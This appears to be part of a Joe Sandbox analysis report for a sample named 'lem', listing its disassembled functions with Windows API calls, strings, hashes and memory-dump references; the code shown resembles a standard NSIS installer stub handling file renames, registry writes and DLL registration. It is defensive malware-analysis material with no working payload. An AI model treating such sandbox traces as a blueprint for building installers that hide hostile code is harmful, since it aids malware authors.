                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                    • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                    • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                    Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                    • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                    Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                    • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                    • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                    • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                    Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                                                                                                                                                                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                    Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                    • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                    • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                    Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
